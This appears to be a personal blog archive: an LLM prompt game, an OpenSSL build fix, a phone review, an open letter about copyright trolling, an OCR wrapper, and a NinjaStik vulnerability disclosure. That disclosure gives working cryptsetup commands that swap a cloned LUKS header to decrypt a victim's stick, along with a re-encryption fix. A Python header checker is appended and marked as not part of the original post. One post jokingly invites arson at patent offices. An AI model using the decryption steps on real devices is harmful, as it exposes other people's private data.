Monday, May 8, 2023

Issue and capability superprompt

I have not been writing in this blog for a while. I have been collecting thoughts.

I thought I'd start small and get to the point with less prosaics. Saves us both time.

I believe this prompt will too, a little now and much more in the future.

Here I'm asking the large language model to relax its propensity to answer correctly and engage in a game.

It named this conversation: Issue-Capability Brainstorm Game and the chat starts like this.

Let's play a game of academic paper. I have a piece of paper. It says issue on top and capability at the bottom. What am I missing in between. Assuming I could be all knowing and have methods.

Based on the information provided, it seems like you have a game prompt that requires you to fill in the missing content between the "issue" and "capability" labels.

To play this game, you may need to define the specific context or topic you want to explore. For example, if you're interested in exploring a problem within a certain industry or field, you could write the issue as a statement that describes the problem or challenge that needs to be addressed.

Next, you could brainstorm potential capabilities or solutions that could help solve the issue. These capabilities could include methods, tools, technologies, or approaches that could be used to address the problem.

To fill in the missing content, you could then write down a list of possible strategies or solutions that could be used to bridge the gap between the issue and capability. These could include steps or actions that could be taken to implement the identified capabilities and solve the issue at hand.

Overall, this game could be a fun and interactive way to explore different problems and potential solutions within a given context or field.

Here's another:

ChatGPT: Based on the information you have provided, it seems like you are missing a research question or topic for your academic paper. The issue and capability statements provide some context but do not provide a clear direction for your research.

To develop a research question, you could consider the following steps:

1. Identify a broad topic area that you are interested in researching.
2. Conduct a literature review to identify gaps in the existing research on this topic.
3. Refine your topic area based on the literature review and identify a specific research question that you want to answer.
4. Develop a hypothesis or set of hypotheses that you will test through your research.
5. Choose appropriate research methods to collect and analyze data that will help you answer your research question and test your hypotheses.

Once you have a clear research question and methodology, you can begin drafting your academic paper. Your paper should include an introduction that outlines the research question, a literature review that provides context for your study, a methods section that describes how you conducted your research, a results section that presents your findings, and a conclusion that summarizes your research and discusses its implications.

It could be interesting to use prompts like these to load context for problem solving tasks. Just like it works in the data that is used to train the large language model.

Remember, I said no prose. No idea if I kept that promise. Let me know.

Monday, September 7, 2015

Streisand Effect and Microsoft Windows updates

It's been told, that Microsoft behaves in a way that would imply unfamiliarity with the concept known as Streisand Effect. Although I'm not 100% sure this will help block anything, I shall leave it to the reader to discover. I did glance through the source and did not find anything amiss.

So if you want to remove and block all those nasty updates Microsoft is forcing down your throat in the name of customer experience whilst seriously invading on your privacy check out this blog and this repository on Github.

Now I'm left wondering whether this was a really effective backdooring campaign or a tool that is too effective for Microsoft's liking. At least I won't have to worry about this since none of my systems run Windows.

Monday, January 5, 2015

Decripple OpenSSL on Fedora

I have grown tired of the travesty which is Redhat's inability to get secp256k1 enabled on the OpenSSL package. This has been a problem since 2007. That's 8 years as of now. This elliptic curve is needed for most if not all cryptocurrencies to build and run correctly. The recommended way to deal with this problem has been linking the binaries directly to a separate version of OpenSSL that people usually install from Ringing Liberty repositories. I'm now recommending that you should just patch the shipped version of OpenSSL whenever there's an update to OpenSSL available from Fedora repositories. I know this is bothersome, but it's the easiest way to deal with this issue until Redhat's lawyers get this shit sorted out whenever that may be.

First you need to get the source rpm:
yumdownloader --source --noplugins openssl

then you install the source rpm (version may and probably will differ):
rpm -ivh openssl-1.0.1j-1.fc21.src.rpm

Fetch the files, patch and build:
cd ~/rpmbuild/SPECS/
mv openssl-1.0.1j-decripple-secp256k1.patch ../SOURCES/
patch < openssl.spec.secp256k1.patch
rpmbuild -bb openssl.spec

Then replace the installed openssl-packages on your system:
cd ~/rpmbuild/RPMS/$(uname -p)
yum reinstall ./openssl-*

Now you can build bitcoind, litecoind, potcoind and so on normally by following the building instructions in the sources.
No more fiddling with LD_LIBRARY_PATH, OPENSSL_OPTIONS, LDFLAGS and so on.

If you happen to walk in the vicinity of a patent office with a canister of gasoline and the desire to burn buildings, do take pictures. I'd like to hang them on my wall. If you happen to be in a position to vote for abolishing the patent system, please do so. Vote for a political candidate that promises to destroy the patent office. The patent system as it is today does nothing to promote the development of new ideas. In fact it hinders innovation.

Friday, September 26, 2014

OnePlus One review+unboxing

The OnePlus One comes in two varieties: the 16GB(269€) and the 64GB(299€) version. Shipping to Finland is 29,99€. I managed to get an invite to buy the OnePlus One 64GB and bought it with the enthusiasm of an Apple fanboy quickly parting with the total sum of 323,99€. Considering the specs I regarded this as not that much damage.

I placed the order on Thursday and the package arrived next Monday.
The package contains a charger, cable, a pin for opening the sim-card slot and the phone. The phone feels nice to the hand. The sandstone black surface provides a nice grip and makes you think how slippery your previous phones have been. The front is basically all glass with chrome framing. The phone has a classic look to it that doesn't go out of style.

The charger came in its own box.
The specs of this device are remarkable. The device comes with CyanogenMod 11S based on Android 4.4, it has a quad-core cpu with enough oomph for any application. There's 3GB of RAM in this device. That's only one gigabyte less than on my laptop on which I'm writing this article. If you go with the 64GB version, you are going to have to work hard to hit the memory limit when installing apps. After a month's use I managed to fill almost 10GB of the available memory and I have a gigabyte of music and a few hundred megabytes of pictures. I've been installing a lot of apps and I have put the phone to heavy use. 740 MB is reserved for cached data only.

The 2100 mAh charger does its job quickly
The OnePlus One has a 5.5 inch display with Full HD resolution. There are two cameras. The 13MP camera on the back can shoot high definition video and has very little noise even in less ideal lighting conditions. The 5MP camera in the front is more than adequate for VoIP. For photographs you might want to use the better camera, but the front camera does the job as well. When capturing your favourite duckface pose, it's easier to use the front camera since you can see the preview on the screen.

The package had some interesting features
The speakers on the phone perform better than I expected from a phone. I'm a heavy user so the battery lasts for about 22 hours for me. With the wifi, mobile data, bluetooth, nfc and gps off it would probably last easily more than 26 hours. If you were to use some app that puts the phone in power saving mode, it would last even longer.

This was inside it
Naturally, if you name your product The Flagship Killer, it also has to have LTE, Bluetooth 4, dual band wireless networking and NFC that can handle software card emulation, payment methods and multi-tag support. I haven't been in a situation where the GPS would have taken any time getting a fix on the location.
IMEI and serial blurred on purpose

It's almost as if I have nothing bad to say about this phone. I did have to make some udev-tweaks on my computer in order to get the Media Transfer Protocol working, but I can't really blame the phone for it. There is no SD-card slot, the baseband firmware is proprietary and the battery cannot be removed without some serious surgery. Those are probably the only bad things I have to say about this phone. The worst being the proprietary firmware. It's a shame OnePlus did not go the extra mile to make a truly open phone. I do like that rooting this phone does not affect the warranty.
The screen had protective plastic on it

On Fedora this change made the phone and operating system talk to each other:

ATTR{idVendor}=="05c6", ATTR{idProduct}=="6764", SYMLINK+="libmtp-%k", ENV{ID_MTP_DEVICE}="1", ENV{ID_MEDIA_PLAYER}="1"

The charger cable is sturdy and sim slot opener is a nice bonus

Sim slot opener for the microsim slot
Oh and unless you turn off the screen gestures, your OnePlus One will wake up on its own and do all sorts of random things if you keep it in your sweaty pocket while helping a friend move. You can find the gestures settings in the settings main menu.

Ready to charge
I've been using the phone for a month now and I recommend it. It's a fine piece of hardware with the best Android distribution available and it's affordable.

Friday, August 29, 2014

An Open Letter: Is copyright trolling a thing in Finland now?

TL;DR; my response to the law firm representing Hustler

I got a nasty letter(in English here) in the mail. I was being demanded 600 euros for alleged copyright infringement. I operate a TOR exit node and an open wireless network. I'm also an active member of the Pirate Party and have been a municipal election candidate in Turku, Finland.

Someone had been downloading a torrent "This Ain't Game Of Thrones XXX" via TOR or my wireless network. The law firm Hedman Partners, who represent Hustler in Finland seemed to have made the assumption that it's ok to make ultimatums demanding money from someone based on the IP-address alone. By request, I translated my previous post to the best of my ability, so excuse any strange wording. I've organized my two blogs so that I post in English here and my other blog has its contents in Finnish.

My thoughts are that it's appalling how low someone is willing to go hustling.(pun, get it?)

Your friendly neighbourhood torrorist replied as follows:

Dear lawyer of Hedman Partners 
Your company has sent me a letter stating that I should pay 600 euros for your company, or otherwise what would follow is something that in your letter was referred to as "further measures". Considering the overall tone of the letter and the fact that it referred to Finnish law and coercive measures by the police, I regard your ultimatum as threatening. As I understood it, I was being demanded monetary compensation for an act I know for certain, I did not do and for which it would be impossible to prove guilt. What I believe made this demand unlawful was the fact that I have not committed the offence mentioned.
According to Finnish law, wrongfully forcing someone to dispose of their financial interests is known as blackmail. Threatening to make known one's porn watching habits unless someone coughs up money sounds to me like activities, for which you can get a sentence. I have heard of other cases where people have been threatened with further measures in order to intimidate innocents to part with their money. I am also concerned that other innocent citizens might not have as much time, energy, or wealth to fight back. Because your actions have the potential to cause so much damage to innocent bystanders, I find it morally questionable. I have made a police report.
I have been a TOR exit node operator for many years and I have also been sharing an open wireless network to my neighbours and the occasional passer by in my neighbourhood. In addition, I have occasionally experimented with operating other anonymizing networks. Many other people contribute to the sum of the traffic that goes through my network. Anyone who has access to the Internet can route traffic along the TOR network, and thus it can pass via my connection. Some of those people are journalists, human rights activists and ordinary citizens, on which some party, often their own state, applies censorship. Without the privacy provided by TOR they may lose their lives. 
Naturally with an open network, also the possibility of abuse arises, and in those cases a proper investigation into the matter must be done. A definition of proper investigation is not presuming guilt based on the IP-address alone and sending a bill and an ultimatum to the internet subscription holder. How many cafés have received letters from Hedman Partners? I'm guessing none. I wonder if any servers located in hosting facilities have got the same attention or is their campaign focused only on private people? As stated in your letter, according to Finnish law, ignorance does not release one from guilt even in copyright cases. Information about the services I've been maintaining have been accessible i.a. in my blog and in the service. They can be found after a quick search by using my name as query terms or by checking my IP-address from exonerator service. It will show that my server has been a TOR-exit node at the time of alleged offence.
However, it is essential that IP-address alone does not identify the offender. A Florida district court judge has already come to this conclusion. An IP-address does not contain any kind of property that could identify the person downloading. You cannot even conclude whether the court has jurisdiction in the area where the downloading happens based on the IP-address alone.
In the US copyright trolling or "legal blackmail" (Extortion Letter Scheme) is already a well-known phenomenon. According to a quick Google search, there has already been a sentence in a slightly grosser case. In similar cases some patent trolls have also been sentenced. Ylivieska district court in Finland has already outlined that the owner has no responsibility for the content of their wireless network traffic.
How I see it, your actions are not in the best interest of your client, so I wonder what you are trying to achieve. Sure, the copyright holder has the right to seek compensation if the material has been distributed or used without permission, but it is not necessarily a rational action to take. Studies have shown that downloaders also buy copyrighted material. It would be rational of the copyright holders to regard downloading as free marketing that will increase sales. By stating this, my purpose is not to provide any excuses for I need none because of my innocence. I just question the rationality of your actions. 
In any case, I can not in good conscience pay the sum you demand. Although I do watch porn from free legal sites and now also from similar sites that accept Bitcoin, the only way I'm involved in this matter is that I provide services that other people may use. Satire porn isn't my cup of tea anyhow. 
I provide these services for humanitarian reasons and without any compensation. In the event that you're still thinking of trying to get me on accessory charges or something else like that, I'd like to remind you that the only thing you could hope to achieve is making it more difficult for innocent people to take care of their privacy, and so would jeopardize especially those people who are most in need of protection. It is known that well-intentioned restrictions will not hinder the actions of criminals, and I do question the credibility of arguments that imply that knowledge of restrictions could bring a sense of security. 
I am very familiar with IT, and I also know something about law. Therefore, I am very sure that you have no such evidence that would make it in your best interest to pursue this case in court.
However, if you believe that I have committed a crime, please do report a crime or otherwise leave me alone. I wish your customer good luck in experimenting with new types of avenues to profit from their content in a changing world. I just hope that this isn't one of those experiments. 
Waiting for your reply,
Sebastian Mäki
Pirate Party of Finland's local domain in Southwest Finland
Voluntary TOR operator and the operator of the open HackLair network 
This is an open letter published in my blog and sent to the email address of Hedman Partners lawyer.

Experiences from past as a TOR exit node operator here and here.(in Finnish)

EDIT: 3.9.2014 If for some reason all the free legal porn in the internet isn't enough for you, you can get more with bitcoin from and other places too.

Monday, October 14, 2013

Tesseract wrapper

GOCR really doesn't seem to recognize Finnish or different kinds of fonts out of the box. Tesseract seems to have no problems in recognizing the content I feed it so I wanted to configure XSANE so that it would use Tesseract instead. Setting up XSANE to use Tesseract is not straightforward though. XSANE expects input and output files to be defined as options, whereas Tesseract accepts the input file as first argument and the basename of the output as second parameter. By default XSANE is configured to use GOCR.

In order to make XSANE work with Tesseract the easy option was just to make a wrapper script that accepts options in the way XSANE can provide them. For this purpose I created a wrapper script for Tesseract.

Comparisons of options:


[sebastian@localhost tesseract-wrapper]$ tesseract --help
Usage:tesseract imagename outputbase [-l lang] [-psm pagesegmode] [configfile...]

pagesegmode values are:
0 = Orientation and script detection (OSD) only.
1 = Automatic page segmentation with OSD.
2 = Automatic page segmentation, but no OSD, or OCR
3 = Fully automatic page segmentation, but no OSD. (Default)
4 = Assume a single column of text of variable sizes.
5 = Assume a single uniform block of vertically aligned text.
6 = Assume a single uniform block of text.
7 = Treat the image as a single text line.
8 = Treat the image as a single word.
9 = Treat the image as a single word in a circle.
10 = Treat the image as a single character.
-l lang and/or -psm pagesegmode must occur before anyconfigfile.

Single options:
  -v --version: version info
  --list-langs: list available languages for tesseract engine


[sebastian@localhost tesseract-wrapper]$ gocr --help
 Optical Character Recognition --- gocr 0.49 20100924
 Copyright (C) 2001-2010 Joerg Schulenburg  GPG=1024D/53BDFBE3
 released under the GNU General Public License
 using: gocr [options] pnm_file_name  # use - for stdin
 options (see gocr manual pages for more details):
 -h, --help
 -i name   - input image file (pnm,pgm,pbm,ppm,pcx,...)
 -o name   - output file  (redirection of stdout)
 -e name   - logging file (redirection of stderr)
 -x name   - progress output to fifo (see manual)
 -p name   - database path including final slash (default is ./db/)
 -f fmt    - output format (ISO8859_1 TeX HTML XML UTF8 ASCII)
 -l num    - threshold grey level 0<160<=255 (0 = autodetect)
 -d num    - dust_size (remove small clusters, -1 = autodetect)
 -s num    - spacewidth/dots (0 = autodetect)
 -v num    - verbose (see manual page)
 -c string - list of chars (debugging, see manual)
 -C string - char filter (ex. hexdigits: 0-9A-Fx, only ASCII)
 -m num    - operation modes (bitpattern, see manual)
 -a num    - value of certainty (in percent, 0..100, default=95)
 -u string - output this string for every unrecognized character
 gocr -m 4 text1.pbm                   # do layout analyzis
 gocr -m 130 -p ./database/ text1.pbm  # extend database
 djpeg -pnm -gray text.jpg | gocr -    # use jpeg-file via pipe


Tesseract wrapper

[sebastian@localhost tesseract-wrapper]$ ./tesseract-wrapper --help
./tesseract-wrapper -i inputfile [-o outputfile] [-l lang]
Clone the repo in Github

Saturday, October 5, 2013

NinjaStik encryption vulnerability

The Discovery

(Photo – Flickr Creative Commons: R’eyes)
We in like gadgets. We also like to know what we sell to our customers, so some of the guys started checking out a shipment of NinjaStiks.

I was trying to do some other work while discussing the NinjaStik, anonymity, encryption and other stuff with my co-workers. I had one of those days you just can't get yourself to concentrate..

I'm sceptical of any security tool that doesn't come with the exact instructions on how to reproduce it yourself. There are some instructions on how to get started and technical specifications on the NinjaStik site, but elsewhere on the site they also mention some secret ingredients. People are corruptible and imperfect so anything produced by a human should be considered compromised until proven otherwise. I was arguing my point about trusting a third party when the discussion diverted to the process of changing the default password on the LUKS-partition. There were instructions on how to do so and they came with the NinjaStik.

The Problem

Changing the password for the master key does not change the master key. NinjaStik is a kind of product that you would assume is most conveniently produced by writing an existing disk image to a thumb drive. This was confirmed to be the case with the images extracted from the NinjaStiks we had at hand. We took 2 different NinjaStiks and found they used the same master key. We can assume that the rest of the shipment are clones as well. This means that the claim that your data cannot be accessed without supercomputers and a million years to spend is false. In fact it took 30 minutes including reading man pages, making coffee and browsing Facebook (you can guess which one of these was the most time consuming). It was kind of cool to be able to demonstrate the ability to read the contents of my co-worker's drive, which according to the marketing by its producer was an impossible feat.

The ease with which the encryption on a NinjaStik was defeated raises questions and answers some. How competent are the people behind the development of NinjaStik? Should you take it for granted that someone who produced a security product understands all the caveats or even the basic ones? We're going to re-encrypt the NinjaStiks we sell to our customers as well as include instructions on how to do it themselves.

It would be irresponsible of us to tell our customers to trust that we don't keep copies of the master keys ourselves, so I would rather tell the customer to assume we do and then decide if they want to re-encrypt their device. Who knows, if by accident there is a copy of the master key somewhere in our swap partition and we're forced to hand over that data. Of course whether the customer needs to worry about the encryption depends much on what the customer chooses to do with their NinjaStik or in life generally. For some, who purchase this product, it doesn't really matter if it's encrypted or not.

I didn't explore NinjaStik beyond this vulnerability as I haven't had the time.

The Aftermath

We contacted a NinjaStik representative on the 29th of September and they updated their FAQ pretty soon after we explained the vulnerability to them and provided instructions on how to fix the situation. According to the representative they used to build the NinjaStiks with a room full of PCs, but they recently started cloning. He told us they would contact the customers with affected NinjaStiks and immediately return to building them with the room full of PCs method. He also offered to rebuild the NinjaStiks we had and pay the shipping costs which was nice of him although unnecessary as it's not much of an effort for us to do it ourselves. According to the representative there aren't many NinjaStiks out there created with the cloning method. We advised them to build NinjaStiks with another boot option that would boot on the first use and re-encrypt the encrypted partition. We then gave them a week to handle the situation on their end before releasing the details of this vulnerability. Still in their updated FAQ they are downplaying the vulnerability:
"Can I change the encryption passphrase?

Yes you can and it is highly recommended – the NinjaStik ships with a default encryption passphrase and a default login password.  Both of these should be changed the first time you use the NinjaStik.  The NinjaStik also includes instructions to change the volume encryption key to further ensure that even we couldn’t gain access to your NinjaStik."
The wording "to further ensure" sounds to me like something you shouldn't really worry about. In reality the opposite is true. It's not even about just them gaining access to the data on your NinjaStik, everyone can. (The different capacity NinjaStiks might use a different master key, but there are copies of the master keys already out there on already purchased sticks.) Also it's more likely that the one trying to decrypt your device is someone you know or the authorities and thus it's more likely that they have access to the same master key as the one used in your batch.

Then there's the issue of cloning being a recent method for production. I don't see many other plausible reasons for them to use a non-cloning process to manufacture an OS on a thumb drive besides lack of knowledge on how to clone disks or the knowledge that it would make the master key on the NinjaStik known. I'm having difficulties understanding how anyone who put this stick together in the first place would not know how to clone them, so I'm inclined to think they knew that they were compromising the encryption, but maybe didn't realize how serious it was or didn't care. But hey, I'm a paranoid tin foil hat person.

The Method

The same master key is used in all NinjaStiks thus any NinjaStik can be decrypted using the known master key or a backup of the LUKS header(it contains the key). I demonstrate here how to gain access using a copy of a header from a fresh NinjaStik. The way LUKS works is that even if you change the password for the keyslot, the actual key used for encryption stays the same. Therefore it is a trivial task to use a known master key(or vanilla header) to decrypt a LUKS device.

Ingredients: 2 NinjaStiks. The victim's NinjaStik, which has an unknown password set, and one with a known password.

# Extract the LUKS header from the new NinjaStik. Password is "password"
cryptsetup luksHeaderBackup --header-backup-file=vanilla-header.bak /dev/sda2

# Remove the NinjaStik and plug in the victim's NinjaStik
# Optional step: extract the LUKS header from the second NinjaStik
cryptsetup luksHeaderBackup --header-backup-file=victim-header.bak /dev/sda2

# Replace the header on the victim's NinjaStik
cryptsetup luksHeaderRestore --header-backup-file=vanilla-header.bak /dev/sdb2

# Open the LUKS partition using the default password "password"
cryptsetup luksOpen /dev/sdb2 stick

# Mount the partition
mkdir /mnt/decrypted
mount /dev/mapper/stick /mnt/decrypted

# Achievement unlocked, you can now read and write on the victim's NinjaStik and compromise any security measure on the operating system residing on the stick (install keyloggers or whatever)

# Unmount the stick and close the LUKS partition
umount /mnt/decrypted
cryptsetup luksClose stick

# Restore the original header to the stick
cryptsetup luksHeaderRestore --header-backup-file=victim-header.bak /dev/sdb2

# The victim's NinjaStik can now again be opened with the password set by the victim.

One alternative approach is to just clone the victim's NinjaStik without making any changes to the stick at all. The contents of the victim's NinjaStik can be decrypted using an image of the victim's NinjaStik and a header with the known password.

The Quick Fix

In order to prevent unauthorized access to a NinjaStik the very first thing a user should do is re-encrypt the LUKS partition. This can be done after booting the computer with a Linux LiveCD. I recommend Fedora Live Desktop. The cryptsetup-reencrypt tool is not preinstalled on the LiveCD, but you can install it from the command line by issuing the command
sudo yum -y install cryptsetup-reencrypt
A quick look led me to the conclusion that cryptsetup-reencrypt tool is not available on Ubuntu 12.04.3 at the moment. After you have booted up the LiveCD open up a terminal, gain root privileges, plug in the NinjaStik and follow these instructions

# identify the last plugged-in device from the kernel log (dmesg output shown)

[ 1494.609774] sd 6:0:0:0: [sdf] Write Protect is off
[ 1494.609781] sd 6:0:0:0: [sdf] Mode Sense: 23 00 00 00
[ 1494.610406] sd 6:0:0:0: [sdf] No Caching mode page present
[ 1494.610409] sd 6:0:0:0: [sdf] Assuming drive cache: write through
[ 1494.613495] sd 6:0:0:0: [sdf] No Caching mode page present
[ 1494.613500] sd 6:0:0:0: [sdf] Assuming drive cache: write through
[ 1494.614011]  sdf: sdf1
[ 1494.616820] sd 6:0:0:0: [sdf] No Caching mode page present
[ 1494.616824] sd 6:0:0:0: [sdf] Assuming drive cache: write through
[ 1494.616827] sd 6:0:0:0: [sdf] Attached SCSI removable disk

# you see here we plugged in the device /dev/sdf
# on the NinjaStik the second partition is the encrypted one
# thus the partition we want to re-encrypt would be /dev/sdf2

# re-encrypt the partition, it will take some time
cryptsetup-reencrypt -B 32 -c aes-xts-plain64 /dev/yourdevice

Alternatively you can and probably should do these operations on a copy of your NinjaStik image instead and after you have confirmed it works write the resulting image on your NinjaStik.

See more info on re-encryption here:

You should check your master key details with cryptsetup luksDump. The default header we had in our stiks looked like this:

Version:        1
Cipher name:    aes
Cipher mode:    cbc-essiv:sha256
Hash spec:      sha1
Payload offset: 4096
MK bits:        256
MK digest:      bb 49 14 91 26 e1 be 4e 45 2c 9e 81 15 95 45 43 14 1d 9c eb 
MK salt:        09 b3 d0 c4 15 8e cb 0b 4c 20 02 39 a3 71 7c 67 
                61 5c 3a ef 8b 3f f9 87 fb d5 bc 03 b9 eb ca 21 
MK iterations:  18750
UUID:           4f85fbe5-2d73-47e4-a59f-3ae3b080d913

In all cases you should re-encrypt. Even if the master key differs from this one. If you find that your master key matches, leave a comment.

The Solution

NinjaStiks should contain a second boot option to boot the stick into a mode where the encrypted partition is not mounted. After booting is complete the stick should run a script that asks the user for a current password and a new password twice. The script should then re-encrypt the encrypted partition and reboot. At the moment this also requires updating the cryptsetup version to 1.5 as the current available version(1.4.1) on Ubuntu 12.04.3 does not contain the re-encryption tool.

A Conclusion

The worst threat to security is false security.

Originally posted in my blog Semantics

If you want to check whether you have a NinjaStik that was manufactured with a cloning process, paste the sha256 digest of your master key digest in the comments below.

The only thing that can be proven is that if you find two drives with the same master key digest, the corresponding master key is very compromised. If the digests are different, it does not prove anything. There is no guarantee that someone does not know the master key of your NinjaStik the moment you receive it, therefore if you have to be absolutely sure nobody else can open your NinjaStik you have to re-encrypt it yourself. You should also request that the NinjaStik manufacturer provides a first start feature, where the stick is re-encrypted with a random master key before use.

If you don't understand what this command does, you probably shouldn't be pasting it into your console (that goes for every tutorial on the interwebs). You should actually never paste stuff directly to your terminal.

# print out the sha256 digest of your master key digest like this
cryptsetup luksDump /dev/yourdevice|grep 'MK digest'|sed -e 's/^MK digest:[[:space:]]*//'|sha256sum
# you should have a hash that is reasonably well anonymized. Paste it in the comments for others to see and compare.
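As an added example (not part of the original post, and not NinjaStik or cryptsetup code), this Python code parses the LUKS1 header fields that luksDump prints and shows why a passphrase change leaves two cloned sticks on the same master key while re-encryption does not. All headers, keys, salts and UUIDs are constructed sample data and the function names are hypothetical.

```python
import hashlib
import hmac
import struct

LUKS_MAGIC = b"LUKS\xba\xbe"
# LUKS1 partition header, big-endian: magic, version, cipher name, cipher mode,
# hash spec, payload offset, key bytes, MK digest, MK salt, MK iterations, UUID.
PHDR = struct.Struct(">6sH32s32s32sII20s32sI40s")
# One of the 8 key slots: active flag, iterations, salt, key offset, stripes.
KEYSLOT = struct.Struct(">II32sII")
SLOT_ACTIVE, SLOT_DISABLED = 0x00AC71F3, 0x0000DEAD


def text_field(raw):
    """Decode a NUL-padded ASCII header field."""
    return raw.split(b"\0", 1)[0].decode("ascii")


def parse_luks1_header(blob):
    """Parse the fixed 208-byte part of a LUKS1 header (what luksDump prints)."""
    if len(blob) < PHDR.size:
        raise ValueError("truncated LUKS header")
    (magic, version, cipher, mode, hash_spec, payload_offset, key_bytes,
     mk_digest, mk_salt, mk_iter, uuid) = PHDR.unpack_from(blob)
    if magic != LUKS_MAGIC or version != 1:
        raise ValueError("not a LUKS1 header")
    return {
        "cipher": text_field(cipher) + "-" + text_field(mode),
        "hash_spec": text_field(hash_spec),
        "payload_offset": payload_offset,
        "mk_bits": key_bytes * 8,
        "mk_digest": mk_digest,
        "mk_salt": mk_salt,
        "mk_iter": mk_iter,
        "uuid": text_field(uuid),
    }


def shares_master_key(a, b):
    """True when two parsed headers wrap the same master key.

    The MK digest is PBKDF2(master key, MK salt, MK iterations), so equal
    digest, salt, iterations and hash spec mean equal keys. A False result
    proves nothing: a different salt hides whether the keys match.
    """
    return (a["hash_spec"] == b["hash_spec"] and a["mk_iter"] == b["mk_iter"]
            and a["mk_salt"] == b["mk_salt"]
            and hmac.compare_digest(a["mk_digest"], b["mk_digest"]))


def key_matches_header(hdr, candidate_key):
    """Check a candidate master key against the header's MK digest."""
    derived = hashlib.pbkdf2_hmac(hdr["hash_spec"], candidate_key,
                                  hdr["mk_salt"], hdr["mk_iter"],
                                  len(hdr["mk_digest"]))
    return hmac.compare_digest(derived, hdr["mk_digest"])


def sample_bytes(label, n=32):
    """Constructed, deterministic stand-in for random bytes (demo only)."""
    return hashlib.sha256(label.encode()).digest()[:n]


def build_sample_header(master_key, mk_salt, uuid, slot_salt, mk_iter=1000):
    """Constructed sample: LUKS1 header with one active key slot, 592 bytes."""
    digest = hashlib.pbkdf2_hmac("sha1", master_key, mk_salt, mk_iter, 20)
    phdr = PHDR.pack(LUKS_MAGIC, 1, b"aes", b"cbc-essiv:sha256", b"sha1",
                     4096, len(master_key), digest, mk_salt, mk_iter,
                     uuid.encode("ascii"))
    slots = KEYSLOT.pack(SLOT_ACTIVE, 1000, slot_salt, 8, 4000)
    slots += KEYSLOT.pack(SLOT_DISABLED, 0, bytes(32), 0, 4000) * 7
    return phdr + slots


def demo():
    factory_key, factory_salt = sample_bytes("factory key"), sample_bytes("factory salt")
    image_uuid = "00000000-0000-4000-8000-000000000001"  # constructed
    # Stick A: as shipped. Stick B: same image, owner changed the passphrase,
    # which rewrites only the key slot. Stick C: re-encrypted with a new key.
    raw_a = build_sample_header(factory_key, factory_salt, image_uuid, sample_bytes("slot a"))
    raw_b = build_sample_header(factory_key, factory_salt, image_uuid, sample_bytes("slot b"))
    raw_c = build_sample_header(sample_bytes("fresh key"), sample_bytes("fresh salt"),
                                "00000000-0000-4000-8000-000000000002", sample_bytes("slot c"))
    a, b, c = (parse_luks1_header(r) for r in (raw_a, raw_b, raw_c))
    return {
        "passphrase_change_altered_header": raw_a != raw_b,
        "a_b_share_key": shares_master_key(a, b),
        "a_c_share_key": shares_master_key(a, c),
        "factory_key_matches_b": key_matches_header(b, factory_key),
        "factory_key_matches_c": key_matches_header(c, factory_key),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

To check your own sticks, feed parse_luks1_header the first 592 bytes of each encrypted partition or a luksHeaderBackup file; a True from shares_master_key means both devices must be re-encrypted.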
